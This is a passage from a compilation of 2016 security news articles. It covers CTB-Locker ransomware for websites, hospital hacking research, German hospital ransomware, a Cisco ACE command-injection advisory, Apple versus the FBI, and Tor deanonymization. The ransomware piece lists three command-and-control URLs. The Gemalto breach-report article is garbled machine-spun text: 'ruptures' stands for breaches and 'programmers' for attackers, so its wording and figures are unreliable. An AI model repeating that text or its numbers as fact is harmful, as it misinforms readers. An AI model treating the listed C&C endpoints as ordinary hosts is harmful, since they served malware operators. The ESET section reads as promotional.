Once the site administrator enters the filename and hit "Decrypt for Free," jquery would be fired up upon the request to test the decryption key in a C&C Server. When the key is received, it'll decrypt any 2 random files and display 'Congratulations! TEST FILES WAS DECRYPTED!!'
The other decryption key would be the one to decrypt rest of the seized files, after making the payment in Bitcoin to the attacker.
All the website's content would be encrypted using an AES-256 algorithm, and a unique ID would be generated for each infected website.
Nearly all possible types of files extensions are being affected by CTB-Locker Ransomware.
Live Session with Ransomware Attackers
Another unique characteristic of the ransomware is giving victims the ability to exchange messages with the ransomware attackers.
The ransomware developers have organized a chat room in such a way that the victims could talk with the ransomware creators after the specifying name of the secret file which is present in the same directory with index.php.
CTB Locker for Website → Modifies Packages in the Server
The CTB-Locker for Website package utilizes a variety of files described below:
index.php : The Main component of CTB-Locker for Websites and contains the encryption and decryption routines as well as the payment page.
allenc.txt : Contains a list of all encrypted files.
test.txt : Contains the path and filenames to two prechosen files that can be decrypted for free.
victims.txt : It contains a list of all files that are to be encrypted. However, the files that are already encrypted will remain in this list.
extensions.txt - The list of file extensions that should be encrypted.
secret_[site_specific_string] : The secret file used by the Free Decrypt and Chat functions and is located in the same folder as the index.php file.
Command and Control Server Location:
According to Benkow Wokned (@benkow_), a security researcher who discovered CTB-Locker for Website, found that the index.php page utilizes the jQuery.post() function to communicate and POST data to the Ransomware's Command and Control (C&C) servers.
Currently, there are three Command and Control servers for CTB-Locker for Websites uncovered by the researchers:
http://erdeni.ru/access.php
http://studiogreystar.com/access.php
http://a1hose.com/access.php
The ransomware also gives a timeslot for the website administrators to recover the files. However, failure to pay the BTC in time would double the ransom amount by 0.8 BTC.
CTB-Locker for Windows
CTB-Locker for Websites isn't the only latest development with this family of ransomware. The ransomware has come to the Windows environment by using executables code signed with a stolen certificate.
Usually, the purpose of digital signature is to authenticate the public about the genuinity of the products. The certificates are provided only after a background check conducted by the Certificate Authorities (CA) like Verizon, DigiCert.
But the cybercriminal group behind the CTB-Locker ransomware has tampered the genuinity of digital certificates. The executable version in the Windows of the CTB Ransomware comes with a pre-signed digital signature.
Uses Encryptor Raas For Code-Signing Certificate
The group behind CBT believed to had taken the advantage of Jeiphoos, another ransomware developer who lets people go to his "Encryptor RaaS" Tor site that provides free digital signature certificates and sign any executable using stolen code-signing certificate.
The act of stealing digital signatures is not new as they are included in the frames from the past years.
Hijacking a company website would economically affect the services that are being offered to users via websites, elevating the issue to another level. However, the major part lies in the POS (Point of Sale) attack, if the threat infects an e-commercial website.
Currently, many websites had been compromised by "CBT-Locker for Website." As per the analysis, many wordpress sites (most of the static web pages) has been found to be targeted by CBT Website Locker.
Since this is not a serious issue like the Locky ransomware that utilizes Macros, the website administrator can make use of the untouched mirrors (backups) to bring back the site into action.
Securing Hospitals from hackers that can put lives in dangers
27.2.2016 Hacking
Securing Hospitals is a report issued by Independent Security Evaluators that demonstrates how hackers can hack hospitals putting lives in danger.
A group of experts from the Independent Security Evaluators research team have tested the security of hospital networks, demonstrating how it is possible to gain access to critical medical equipment in attacks they say could put lives in danger.
The study was led by healthcare head Geoff Gentry, the results of the test conducted are reported in an interesting paper titled “Securing Hospitals.”
The experts demonstrated that such kind of cyber attacks could put lives in danger, for example hacking patient monitors is possible to display false information which could result in medical responses that injure or kill patients.
They security researchers examined 12 healthcare facilities, two data centres, two web applications, and a couple of live medical devices that could be hacked remotely by threat actors.
“The research results from our assessment of 12 healthcare facilities, 2 healthcare data facilities, 2 active medical devices from one manufacturer, and 2 web applications that remote adversaries can easily deploy attacks that target and compromise patient health. We demonstrated that a variety of deadly remote attacks were possible within these facilities, of which four attack scenarios are presented in this report. ” states the report.
The 71-page document is one of the most interesting study on the level of security of hospitals and the analysis of the resilience of medical devices to cyber attacks.
In the report is detailed a typical attack scenario where a foreign group could launch a cyber attack against the patients of the medical structure triggering vulnerabilities in passive medical devices.
The experts targeted an externally facing web server exploiting its vulnerabilities to gain control of the machine, once inside the network the attackers moved laterally searching for vulnerable devices to compromise.
“On a disconnected network segment, our team demonstrated an authentication bypass attack to gain access to the patient monitor in question, and instructed it to perform a variety of disruptive tasks, such as sounding false alarms, displaying incorrect patient vitals, and disabling the alarm,” the team says in the paper.
“This attack would have been possible against all medical devices … likely preventing assistance and resulting in the death or serious injury of patients.”
“The attack scenario is harrowing: Diligently executed, many human lives could be at stake, and extrapolating this problem to other hospitals is even more worrisome.”
Patient data could be easily stolen by attackers, attackers for example can exploit a cross-site scripting flaw inside a web application.
The experts dedicated a specific session of their test to cyber attacks relying on USB drives that could be used by hackers as bait. In one of the tests, the team of researchers dropped 18 infected sticks around hospitals, the malware present on the USB sticks allowed them to harvest information from terminals and establish a backdoor inside the systems.
In one case the attackers successfully breached the hospital drug dispensary service.
“At the time of this reporting, we are working to demonstrate that an attack against the particular dispensary is possible, meaning that anyone who can connect to the dispensary can then get access to the configuration interface and manipulate what the device believes it has to be its inventory. If this medication were then given to a patient, it would likely harm or kill the patient.” said the hackers.
The researchers also dedicated great attention to physical security, the team analyzed the presence of exposed hardware device ports and open computers operating in patient rooms, too easy to hack.
“The findings show an industry in turmoil: lack of executive support; insufficient talent; improper implementations of technology; outdated understanding of adversaries; lack of leadership, and a misguided reliance upon compliance,” states the report.
“[It] illustrates our greatest fear: patient health remains extremely vulnerable. One overarching finding of our research is that the industry focuses almost exclusively on the protection of patient health records, and rarely addresses threats to or the protection of patient health from a cyber threat perspective.”
The experts concluded that networks in the Hospitals are often insecure, in many cases the organizations lack of security policies and never audit their systems exposing patients to risk of cyber attacks.
“We found egregious business shortcomings in every hospital, including insufficient funding, insufficient staffing, insufficient training, lack of policy, lack of network awareness, and many more,” researcher Ted Harrington says. “These vulnerabilities are a result of systemic business failures.”
The findings demonstrate that patient health remains extremely vulnerable to cyber attack.
Gemalto Breach Level Index report 2015, what are hackers looking for?
27.2.2016 Hacking
2015 Gemalto Breach Level Index report confirmed the increased interest of threat actors in Government and healthcare data.
As per the security firm Gemalto, Government and healthcare have overwhelmed the retail area as most-focused for information breaks.
An aggregate of 1,673 information ruptures prompted 707 million information records being traded off worldwide amid 2015, as indicated by the most recent release of Gemalto Breach Level Index report.
Not all ruptures are just as genuine and the quantity of records revealed is stand out metric. The Gemalto Breach Level Index report endeavors to perceive this by appointing a seriousness score to every rupture (security breach) in view of elements including the sort of information and the quantity of records traded off, the wellspring of the break, and regardless of whether the information was encoded. The philosophy expects to recognize aggravations from high effect mega breaks.
More than 3.6 billion information records have been uncovered following 2013, when Gemalto started benchmarking freely unveiled information breaks. In 2015, vindictive outcasts (ie, programmers) were the main wellspring of these ruptures, representing 964, or 58 percent of breaks and 38 percent of records being compromised. Exposure or coincidental of data records represented 36 percent of all records.
According to the Gemalto Breach Level Index report, the quantity of state-supported assaults represented only 2% of the data breach incidents being reported, yet the quantity of records bargained as an aftereffect of those assaults made up 15 percent of all records uncovered.
The lopsided effect of a little number of breaks is halfway clarified by the high effect rupture at the United States Office of Personnel Management (OPM), which uncovered the individual points of interest of different government workers and released all way of “sensitive” data from historical verifications and related archives. Noxious insiders represented 14 percent of all the data ruptures and only 7% of the traded off (compromised) records.
Regarding geographic areas, 59 per cent reported break mishaps happened in the United States. Europe represented twelve percent of general rupture occurrences, trailed by the Asia Pacific locale at 8%.
Identity theft issue remained the essential kind of break, representing 53 per cent of the data ruptures and 40 percent of all records that were compromised.
Sector of Government represented 43 percent of the compromised/traded off information records, a five-fold increment more than 2014 because of a few substantial information ruptures in the United States and Turkey, and sixteen percent of all the information/data breaks. Healthcare area represented 19 percent of the aggregate records being compromised and 23 percent of all information/data breaks.
By complexity, the retail area saw the quantity of stolen information records dropping 93 per cent year-on-year, so it represented only six percent of stolen records and 10 percent of the aggregate number of ruptures in 2015.
This is in expansive part in light of the fact that 2014 was an especially unpleasant year for data information breaks in the retail division, with issues at Home Depot and others skewing numbers towards the stratosphere. The financial administrations segment likewise saw an almost 99 percent drop, speaking to only 0.1 per cent of the traded off/compromised data records and 15 percent of the aggregate number of ruptures.
They are not attempting to split your ledger – and that is terrible news for you
Criminal programmers in the course of the most recent year or so have moved their concentrate far from conventional card misrepresentation and towards taking individual data in the facilitation of the identity fraud/theft. This change is terrible news for both buyers and organizations alike, as indicated by Gemalto.
Chief technology officer for data protection and Vice President at Gemalto, Jason Hart said,
“In 2014, consumers may have been concerned about having their credit card numbers stolen, but there are built-in protections to limit the financial risks” . “However, in 2015 criminals shifted to attacks on personal information and identity theft, which are much harder to remediate once they are stolen.”
As organizations and gadgets gather continually expanding measures of client data and as purchasers’ online advanced exercises turn out to be more different and productive, more information about what they do, who they are and what they like is at danger to be stolen from the organizations that store their information.
He added, “If consumers’ entire personal data and identities are being co-opted again and again by cyber thieves, trust will increasingly become the centerpiece in the calculus of which companies they do business with”.
Ransomware attacks paralyzed at least two German hospitals
27.6.2016 Virus
New ransomware infections hit hospitals in Germany, at least two of them were infected by the dreaded malware.
According to local reports, the systems at two German hospitals were infected by a ransomware, in a similar way occurred recently at the US Hollywood Presbyterian Medical Center.
According to the German broadcaster Deutsche Welle, the German hospitals infected by the ransomware are the Lukas Hospital in the city of Neuss and the Klinikum Arnsberg hospital in North Rhine-Westphalia.
German hospitals infected by malware Lukas Hospital in the city of Neuss
“Several hospitals in Germany have come under attack by ransomware, a type of virus that locks files and demands cash to free data it maliciously encrypted. It will take weeks until all systems are up and running again.” reported the broadcaster.
A few weeks ago, the staff at the Lukas Hospital noticed a progressive deterioration of system performance, while error messages were popping up.
“We then pulled the plug on everything,” spokesperson Dr. Andreas Kremer told DW. “Computers, servers, even the email server, and we went offline.”
The ransomware paralyzed the hospital’s architecture, the incident occurred on February 10, 2016. The internal IT staff will take weeks until everything’s back to normal.
“Our IT department quickly realized that we caught malware that encrypts data. So if the X-ray system wants to access system data, it failed to find it because it’s been encrypted, so it displays an error message,” Kremer said.
The staff at the hospital used phone and fax to communicate with patients, the staff explained that a number of high-risk surgeries have been postponed because of the cyber attack.
The hospital reported the incident to the authorities and to the State Criminal Investigation Office (LKA) which are currently investigating on the case.
“We haven’t received a concrete demand for money, but we’ve seen these pop up windows that appear if you don’t stop the ransomware on a computer,” he told DW. The message in broken English points to an anonymous email address to get in touch with. “Following the Criminal Police Office’s advice, we didn’t do that,” Kremer said.
Fortunately, the IT staff at the hospital makes regular backups of the data.
“We have regular backups, so that isn’t a problem. If the virus encrypted data we have backed up, we just restore the backup files,” Kremer said.
The incident at Klinikum Arnsberg occurred a couple of days later, also in this case the systems were infected by a ransomware that was spread through phishing emails.
In this case, only one of 200 servers was infected by the malware, the IT staff recovered the situation by restoring a working backup.
“According to present knowledge, it was an attachment in an email that allowed the virus to enter the system,” Klinikum Arnsberg spokesperson Richard Bornkeßel told DW. “Fortunately, it was only one server that was affected. The virus had started to encrypt files, but we could simply restore them from a backup,”
Both German hospitals haven’t paid the ransom.
Windows 10 Started Showing Ads on LockScreen — Here's How to Turn It OFF
26.2.2016 OS
If you've upgraded your older version of Windows OS to an all new Windows 10 operating system then you may have noticed an advertisement appearing on your desktop or laptop’s lock screen over the past couple of days.
Yes, this is what Microsoft has chosen to generate revenue after offering Free Windows 10 Download to its users: Monetize the Lock Screen.
Thanks to Windows 10's new Spotlight feature that usually shows you clean and beautiful photographs and fun facts on your lock screen, but now started displaying advertisements to over 200 Million devices running Windows 10.
Some Windows 10 users have reported seeing ads for Rise of the Tomb Raider with links to Windows Store from where users can purchase the video game. Microsoft started selling the game last month.
Although the ads are not as annoying as the Windows 10 privacy concerns related to the way Microsoft collects your personal data, the good news is that you can turn the ads OFF.
Must Read: How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically.
Here's How to Turn the Ads OFF
Disable Windows 10 Lock Screen Advertisement
The advertisements are because of the Windows Spotlight feature in your Personalization settings.
If you don't want to see these intrusive ads, follow the steps given below to disable Windows Spotlight:
Open the Start Menu and look for 'Lock Screen Settings.'
Under 'Background,' Choose either 'Picture' or 'Slideshow,' instead of Windows Spotlight.
Now, Scroll down to 'Get fun facts, tips, tricks, and more on your lock screen' and uncheck this box.
The advertisements are turned ON for your lock screen by default, which is definitely a clever way to offer companies to reach their customers, without mentioning the word 'advertisements' to the Windows users.
windows-10-settings
Also Read: If You Haven't yet, Turn Off Windows 10 Keylogger Now.
As I previously said: Nothing comes for Free, as "Free" is just a relative term. Everything comes with its own price.
As warned last year, Microsoft also started pushing Windows 10 upgrades onto its user's computers much harder by re-categorizing Windows 10 as a "Recommended Update" in Windows Update, instead of an "optional update."
How To Keep Your Android Phone Secure
26.2.2016 Android
As the number of threats is on the rise, Android platform is no longer safe, which isn't a surprise to anyone.
Most of us are usually worried more about the security of our desktops or laptops and forget to think about the consequences our smartphones can make if compromised or stolen.
Unlike desktops, your smartphones and tablets carry all sorts of information from your personal photographs, important emails, messages to your sensitive financial details. And due to rise in mobile usage, the hackers have shifted their interest from desktops to the mobile platform.
Nowadays, nearly all possible threats that were previously attacking desktop platform are now targeting smartphone users.
Ransomware, Phishing, Spams, Spyware, Botnets, Banking Malware, OS and Software vulnerabilities, just to name a few examples, but users don't understand the potential threat when it comes to mobile devices.
Additionally, your smartphones and tablets are also subjectable more threats like, Smartphone Thefts and unnecessary app permissions that allow even legitimate & reputed companies to spy on you.
However, there are a number of solutions to solve all the above issues, but for that, you generally need to install multiple cumbersome and untrusted applications to your mobile devices.
Like a good antivirus to resolve malware and virus issues, an app to manage Android app permissions, a device tracking application in case your device is lost or stolen and lots more and installing all these apps consume lots of space, RAM, the battery of your device.
I frequently receive these types of queries from my readers who ask me for some good solution that could solve most of the security and privacy issues in one go.
So I headed to Google Play Store and started searching for an app that offers a full suite of security and privacy tools. I came across some reputed apps, but they resolve few issues and some apps that address several issues but originate from some vendor I can’t trust.
Then I came across , which comes from one of the reputed antivirus vendors, that is offering protection for all the threats we discussed above.
Anti-Virus Feature with 99.9% Detection Rate
best-mobile-antivirus-app
As its primary role, ESET offers the best antivirus scanning for your smartphone devices with up-to-date threat database and clean mobile app interface.
According to the latest test and review conducted by AV-TEST, an independent lab, ESET mobile security antivirus detects 99.9% of latest threats with the protection and usability score 6 out of 6.
After installing and registering my account, the app's Anti-Virus feature offered me options to have my smartphone scanned periodically:
At specific times, when I’m not using my phone, or
When I plugged in my smartphone for charging
Moving further, I found 3 different levels of scanning available in the software: Quick Scan, Smart Scan, and Deep Scan. So, one can choose to perform any of the options one's feel suitable. I chose Deep Scan that scanned every data and files available on my phone.
ESET Mobile Security also allows to access scan logs easily, and one can also have a look at quarantined items (suspicious files or malware) detected by the anti-virus.
Moreover, the anti-virus feature is also offering a series of advanced antivirus options, including support for ESET Live Grid, detection of potentially unwanted or harmful applications and real-time protection.
Anti-Theft (Remote Lock / Remote Wipe / Locate)
android-anti-theft-app
It is always unfortunate when our expensive mobile device is lost or stolen. Many apps in the market offer device recovery feature via GPS-based tracking, but many times these apps are unable to locate the device. Even if an attacker somehow gets access to the device, it is easy for him/her to uninstall the tracking app.
But, I liked the way works. It is designed to help you easily track your lost or stolen device, and password protects your app so that no one can uninstall it, except you.
All you need to do is:
Set a trusted SIM card within the app.
Provide a trusted number in case of emergency
In the case of lost or stolen, you can log into your ESET account at my.eset.com and track your devices through an easy-to-use web interface and ensure that all your data remains protected from unauthorized users.
As soon as you mark your device as 'Missing' on the online portal, the location of your stolen or lost device will be displayed on a real-time map so that you can easily trace it. You can even view a list of IP addresses that your lost device was connected to.
Bonus — 'Selfies' of Phone Thieves: Marked as Missing devices will automatically capture photographs with its back and front cameras, and then send them to the online portal, which helps you find the location of a missing device easier.
But, What if your stolen device is not connected to the Internet?
Here's How you can Protect Your Smartphone:
Like other apps, ESET Anti-Theft feature lets you send an SMS message command from a trusted number to remotely lock or erase your smartphone data immediately, as well as ringing it in case it has been lost somewhere nearby.
On the top of that, ESET Anti-Theft functionality provides a series of new features, like even if an unauthorized SIM card has been inserted in your stolen smartphone, you can send remote commands to it.
Even if someone tries a wrong PIN or pattern on your smartphone, or insert an unauthorized SIM, your device will be able to take preventive actions on its own in an effort to ensure that your data remains protected.
Device Monitoring and Application Audit:
android-security-app
These features are something that most of us ignore while searching for a good mobile security solution.
Today many apps, even legitimate, request for unnecessary app permissions. Some of your apps can make phone calls, track your location, read your browsing history, contacts, SMS, photos and calendar, and even share this data with third-party advertising companies without your knowledge.
And since I'm security conscious, I always make sure which app is requesting what permissions and for this I found ESET Mobile Security best fit for me.
ESET Mobile Security offers 'Application Audit' feature to help you know what permissions various apps installed on your smartphone or tablet have.
You can click on any app listed in the Application Audit interface, which will land you to your smartphone’s settings menu, from where you can easily restrict unnecessary app permissions or even uninstall it.
Besides this, the app offers you 'Device Monitoring' feature that will help you inform any necessary settings you haven't set correct that could compromise your security.
Anti-Phishing and SMS/MMS/Call Blocker
android-anti-phishing-app
Phishing emails, messages and even contacts are common these days. Hackers or malicious attackers can trick you handing over your sensitive accounts like banking, email or social media accounts access to them.
So, it has become important for us to keep an eye on every email and message that we receive every day, but it’s not as easy as it sounds.
This app resolves the above hurdle as well. ESET's Anti-Phishing feature offers an additional level of protection when you browse the web from your smartphone or tablet.
Though the app doesn't support all browsers currently, you can choose the one that is present on the list of supported browsers to navigate the web.
Besides all the above tools, ESET Mobile Security also offers text messages (SMS), and multimedia messages (MMS) and phone calls blocking capabilities to Android users.
So you can easily opt to simply block calls and messages from all unknown numbers, or more interestingly, all or specific known numbers — with options for both incoming and outgoing blocks.
android-antivirus-security-app
In short, I found ESET Mobile Security a package of security and privacy tools bundled into a single app.
The app is fast, provides a user-friendly interface, keeps you safe from malware, protects against phishing attacks, with numerous other tools to keep your smartphone safe even when it's out of your hands.
However, ESET Mobile Security app doesn't provide any Encrypted Cloud-based Backups, device encryption, which I will like to see in-built in the future.
Overall, ESET Mobile Security for Android is a solid choice for protecting your smartphone or tablet with its top-notch malware protection and huge array of anti-theft and privacy-protection features.
You can download and install app for FREE for a lifetime from the Google Play Store if you are seeking for basic protection capabilities.
However, those seeking for Advanced security and privacy protection on their smartphones should upgrade to a premium subscription, via in-app purchase.
Apple hires developer of World's Most Secure Messaging App
26.2.2016 Apple
Apple is serious this time to enhance its iPhone security that even it can not hack. To achieve this the company has hired one of the key developers of Signal — World's most secure, open source and encrypted messaging app.
Frederic Jacobs, who worked to develop Signal, announced today that he is joining Apple this summer to work as an intern in its CoreOS security team.
"I'm delighted to announce that I accepted an offer to be working with the CoreOS security team at Apple this summer," Jacobs tweeted Thursday.
Signal app is widely popular among the high-profile privacy advocates, security researchers, journalists and whistleblowers for its clean and open source code, and even the NSA whistleblower Edward Snowden uses it every day.
Signal messages are end-to-end encrypted, which means only the sender and the intended recipient can read the messages. Although Apple's iMessage is also end-to-end encrypted, it is not open source.
Apple to build 'Unhackable' Services
The reason behind the Apple's hiring is quite clear as the company is currently fighting a US court order asking Apple to help the FBI unlock iPhone 5C of San Bernardino shooter Syed Farook.
Basically, Apple is deliberately forced to create the special, backdoored version of iOS, so that the Federal Bureau of Investigation (FBI) may be able to Brute Force the passcode on Farook's iPhone without losing the data stored in it.
However, Apple CEO Tim Cook has already refused to provide such a backdoor into the iPhone that would degrade the privacy and security of all iPhone users.
If comply with the court order, the company would be flooded by the FBI and the CIA requests to unlock more iPhones of criminals in near future and the recent request made by the United States government to unlock 12 more iPhones would be just a starter.
But, in an effort to eliminate the chance for government and intelligence agencies for demanding backdoors, the company is removing its own ability to do that, for which they are hiring new interns in its core security team.
Apple found Jacobs a good fit for this, as he had spent two and half years with Open Whisper Systems, the company behind Signal, before leaving the company earlier this year.
Apple to Fully Encrypt iCloud Backups
In San Bernardino shooter's case, Apple admitted that it helped the FBI in every possible way by providing iCloud Backup of Farook, but now…
Apple is working on encrypting iCloud backups that only the account owner would have access, eliminating either way for the government or hackers that could expose its users data.
While creating iCloud backups of users' photos, videos, app data, iMessage, voicemails, SMS, and MMS messages, Apple stores a copy of its users' decryption keys itself that could be provided to authorities when presented with a valid warrant.
But citing some anonymous sources, the Financial Times reports that now Apple will not keep a copy of user's decryption key with it, and the encrypted iCloud backups would only be unlocked by the account holder using her/his passcode.
Discover how many ways there were to hack your Apple TV
26.2.2016 Apple
Apple has patched more than 60 vulnerabilities affecting the Apple TV, including flaws that can lead to arbitrary code execution and information disclosure.
IoT devices are enlarging our attack surface, we are surrounded by devices that manage a huge quantity of information and that could be abused by hackers.
Apple has patched more than 60 vulnerabilities affecting the Apple TV, including flaws that can lead to arbitrary code execution, information disclosure, crash of the application, modifications to protect parts of the filesystem.
This new release of Apple TV version 7.2.1, comes 10 months after the lasted update issued in April 2015. The new version fixes a number of security vulnerabilities in several components of the Apple TV. The company has patched 33 issued, collectively referenced in 58 CVEs, Apple fixed 19 code execution holes that could be exploited with crafted web content.
The changes will be automatically applied to the users that have enabled the automatic updates.
The experts at Apple solved serious security issued residing in the WebKit, the kernel, the third-party app sandbox, Office Viewer, IOKit, ImageIO, FontParser, DiskImages, bootp, CloudKit, and other libraries.
A close look at the list of security holes reveals the presence of a memory corruption flaw (CVE-2015-5776) that could be exploited to by a remote attacker to gain arbitrary code execution or crash applications. Other security vulnerabilities could be triggered by attackers using malicious or malformed DMG files, plists, and apps.
The new release included a series of fixes that Apple has released over the time for other products, the company is spending a significant effort to design a new generation of devices with improved security and that meets strict requirements in term of security.
Recently the company refused to hack into the San Bernardino shooter’s iPhone, and while the dispute with the FBI is going on, it has been reported that Apple is working on a new model that will be impossible to hack.
Wikileaks – NSA tapped world leaders for US geopolitical Interests
26.2.2016 BigBrothers
The NSA tapped world leaders for US Geopolitical Interests, including a conversation between Netanyahu-Berlusconi over the U.S.-Israel Relations.
A couple of days ago the non-profit journalistic organisation WikiLeaks published a collection of highly classified documents that reveals the NSA targeted world leaders for US Geopolitical Interests.
Some of the intercepts are classified TOP-SECRET COMINT-GAMMA, these are most highly classified documents ever published by a media organization.
In particular, one of the documents, reports eavesdropping activities conducted by the US intelligence that spied on the communication between the German Chancellor Angela Merkel and UN Secretary-General Ban Ki-moon on climate change negotiations.
The agents of the National Security Agency have bugged a private climate change strategy meeting between the two politicians held in Berlin.
In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. The cyber the spies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the UE.
Julian Assange, editor-in-chief at Wikileaks, released the following declaration on Wednesday:
“[it] further demonstrates that the United States’ economic espionage campaign extends to Germany and to key European institutions and issues such as the European Central Bank and the crisis in Greece.” “Would France and Germany have proceeded with the BRICS bailout plan for Greece if this intelligence was not collected and passed to the United States – who must have been horrified at the geopolitical implications?”
wikileaks NSA
The new lot of classified documents also revealed that espionage on the Chief of Staff of UN High Commissioner for Refugees (UNHCR), an activity that was conducted by the US intelligence for a for a long time, the spies intercepted targeting his Swiss phone.
Under the control of the US intelligence there was also the Director of the Rules Division of the World Trade Organisation (WTO), Johann Human, but most interesting cables for the Italian Government are related the espionage of the Prime Minister Silvio Berlusconi.
The interceptions were conducted by the Special Collection Service (SCS), a team of cyber spies operating under diplomatic cover in US embassies and consulates around the world. “Back in 2013, thanks to a Snowden document dated 2010, l’Espresso and la Repubblica revealed how Italy was the only European country, along with Germany, to have two Scs teams on its territory: one in Rome and the other in Milan. ” reported an article published by the Italian L’Espresso.
The documents leaked by Wikileaks confirmed that in March 2010 the US Government has intercepted communications between Italian Prime Minister and the Israeli PM Netanyahu, information disclosed reveals that Berlusconi promised to assist in helping Israel in mending the damaged relationship with the U.S..
The crisis between the United States and Israel was triggered by the announcement of Netanyahu’s plans to build 1,600 houses in East Jerusalem. Berlusconi offered its support to Israel in helping mend the situation.
According to these documents leaked by Assange’s organization, the NSA targeted targeted all the members of the Silvio Berlusconi’s staff, including his personal advisor Valentino Valentini, Berlusconi’s National Security Advisor Bruno Archi, Marco Carnelos, and the Permanent Representative of Italy to the NATO, Stefano Stefanini.
In October 2011, the NSA also intercepted a Valentino Valentini’s top-secret/Noforn document.
Documents confirms the US intelligence also intercepted a critical private meeting between then French president Nicolas Sarkozy, Merkel and Berlusconi, where Sarkozy defined the situation of the Italian banking system as ready to “pop like a cork.”
Which is the position of the Italian Government?
Many Italian security experts are not surprised by these revelations, myself included, from the institutional perspective, it seems that the current Italian Government is ignoring the serious facts.
“The current Italian PM, Matteo Renzi, has essentially ignored the case, whereas the former Italian PM, Enrico Letta, speaking to the Chamber of Deputies in the midst of the most heated phases of the Nsa scandal, declared: «Based on the analysis conducted by our intelligence services and our international contacts, we are not aware that the security of the communications of the Italian government and embassies has been compromised, nor are we aware that the privacy of Italian citizens has been compromised». continues the Expresso.
The Italian government has summoned the American ambassador to Rome following the embarrassing revelations.
The document disclosed by Wikileaks also revealed other operations conducted by the US Intelligence, including the interception of the top EU and Japanese trade ministers.
“Today we proved the UN Secretary General Ban Ki-Moon’s private meetings over how to save the planet from climate change were bugged by a country intent on protecting its largest oil companies. Back in 2010 we revealed that the then US Secretary of State Hillary Clinton had ordered her diplomats to steal the UN leadership’s biometric data and other information. The US government has signed agreements with the UN that it will not engage in such conduct. It will be interesting to see the UN’s reaction, because if the United Nations Secretary General, whose communications and person have legal inviolability, can be repeatedly attacked without consequence then everyone is at risk.” said WikiLeaks editor Julian Assange.
Cisco fixes Command Injection vulnerability in CISCO ACE 4710 products
26.2.2016 Vulnerebility
Cisco has released security updates for the products CISCO ACE 4710 appliance to fix a high severity command injection vulnerability.
This week CISCO published a security advisory related a Command Injection Vulnerability (CVE-2016-1297) affecting its product Cisco ACE 4710 Application Control Engine Command. The vulnerability was reported to the company by Jan Kadijk, an expert at Warpnet BV.
The Cisco ACE 4710 Application Control Engine equipment is a protection solution designed to enhance application availability and performance and improve the resilience to cyber attacks.
The Cisco ACE 4710 Device Manager GUI doesn’t correctly validate user input exposing users to remote attack, authenticated attacker would execute any command-line interface commands with administrator privileges. The Cisco ACE 4710 Application Control Engine protection solution is in phasing out, CISCO no longer commercialize the solution since January 2014, but it is currently supporting it until January 31, 2019.
“A vulnerability in the Device Manager GUI of the Cisco ACE 4710 Application Control Engine could allow an authenticated, remote attacker to execute any command-line interface (CLI) command on the ACE with admin user privileges. ” states the CISCO advisory.
“The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by crafting a malicious HTTP POST request with injected CLI commands inside the value of a POST parameter value. An exploit could allow the attacker to bypass the role-based access control (RBAC) restrictions enforced by the Cisco ACE Device Manager GUI.”
The exploitation of the vulnerability is quite simple, the attacker needs to send specially crafted HTTP POST request with commands injected into the value of the POST parameter.
CISCO informed that the security flaw affects Cisco ACE 4710 appliances running A5 software versions up to A5(3.0) that have enabled the access to the Device Manager GUI.
The company has already released the security patches and suggested as a workaround to disable the Device Manager GUI.
CISCO confirmed that there is no evidence that the flaw has been exploited in the wild.
Recently CISCO has issued security advisories for vulnerabilities rated critical and high severity, among the flawed products there are the devices the Industrial Ethernet 2000 Series and CISCO ASA firewalls.
The new iPhone designed by Apple will be unhackable
26.2.2016 Apple
Apple has begun developing security features for the new iPhone to make it impossible for the law enforcement agencies to break into a locked iPhone
The news related to the request made by the FBI to Apple of unlocking the iPhone of Syed Farook, one of the San Bernardino shooters has raised the debate on the efficiency of encryption measures implemented to protect users’ privacy.
Apple’s CEO was categorical on the subject:
“The only way to get information — at least currently, the only way we know — would be to write a piece of software that we view as sort of the equivalent of cancer. We think it’s bad news to write. We would never write it,” Tim Cook explained in the interview.
While the US Government invites the company to implement a mechanism to allow law enforcement the access to mobile devices during the investigation on suspects, Apple is working on a new iPhone that will be unhackable even by the experts of the company.
According to the New York Times, Apple is studying new security features will not allow the use of hacking techniques to bypass the passcode that protects iPhone and iPad.
“Apple engineers have begun developing new security measures that would make it impossible for the government to break into a locked iPhone using methods similar to those now at the center of a court fight in California, according to people close to the company and security experts.” states a blog post published on the NYT.
The new iPhone will not allow law enforcement and intelligence agencies to bypass security measures implemented by Apple.
The US authorities have requested Apple to unlock 12 more iPhone devices, but if the company Apple agrees to one request, there is the concrete risk that it will be a huge number of similar requests.
Clearly Apple is also trying to benefit the story, refusing the FBI’s request it will reinforce its image of privacy with its customers.
“For all of those people who want to have a voice but they’re afraid, we are standing up, and we are standing up for our customers because protecting them we view as our job,” added Tim Cook in an interview with ABC News.
The DoD funded the Carnegie Mellon University’s research on Tor Hacking
26.2.2016 Hacking
A judge has confirmed that US Departement of Defense funded the Carnegie Mellon University to conduct research on the Tor hacking.
In November 2015, the researchers at the Tor Project publicly accused the FBI of paying the experts at the Carnegie Mellon University to deanonymize Tor users.
The experts at the Tor Project collected information about the attack technique elaborated in 2014 by Carnegie Mellon researchers on the popular anonymizing system.
In January 2014, the attackers used more than 100 Tor relays in an attempt to deanonymize suspects. Fortunately the researchers at the Tor Project removed from the network in in July 2014.
The Director of the Tor Project Roger Dingledine accused the FBI of commissioning to the Carnegie Mellon boffins a study on methods to de-anonymize Tor users. The FBI has paid at least $1 million track Tor users and to reveal their IP addresses as part of a large criminal investigation.
“Apparently these researchers were paid by the FBI to attack hidden services users in a broad sweep, and then sift through their data to find people whom they could accuse of crimes. We publicized the attack last year, along with the steps we took to slow down or stop such an attack in the future:
https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
Here is the link to their (since withdrawn) submission to the Black Hat conference:
https://web.archive.org/web/20140705114447/http://blackhat.com/us-14/briefings.html#you-dont-have-to-be-the-nsa-to-break-tor-deanonymizing-users-on-a-budget
along with Ed Felten’s analysis at the time:
https://freedom-to-tinker.com/blog/felten/why-were-cert-researchers-attacking-tor/
We have been told that the payment to CMU was at least $1 million.” reads a blog post published by the Tor Project.
The FBI has paid at least $1 million to the researchers to find a way to de-anonymize users under investigations of law enforcement.
The research was funded by the Department of Defense (DoD) and the FBI obtained the information on alleged criminals after serving a subpoena to Carnegie Mellon’s Software Engineering Institute (SEI).
